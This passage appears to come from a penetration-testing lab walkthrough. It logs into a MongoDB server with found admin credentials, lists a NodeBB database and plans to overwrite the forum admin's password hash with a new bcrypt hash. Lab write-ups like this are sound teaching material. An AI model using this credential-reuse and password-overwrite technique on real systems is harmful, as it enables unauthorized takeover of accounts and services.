With valid credentials we can overwrite databases and chage passwords and configuration for other services that are around. This could be generating a new htapssword for webdav or nodebb.
┌──(kali㉿kali)-[~]
└─$ mongo mongodb://admin:monkey13@192.168.120.186:27017/
MongoDB shell version v4.2.13
connecting to: mongodb://192.168.120.186:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("42164b37-99dd-429d-91fc-65cc46e0240a") }
MongoDB server version: 4.0.22
...
---
> show databases
admin 0.000GB
config 0.000GB
local 0.000GB
nodebb 0.000GB
>
We see a single record in the collection, which belongs to the default admin user. We need to generate a new salted password hash to replace the password field in the record. We can do that with the htpasswd utility by generating a new bcrypt hash of the password password.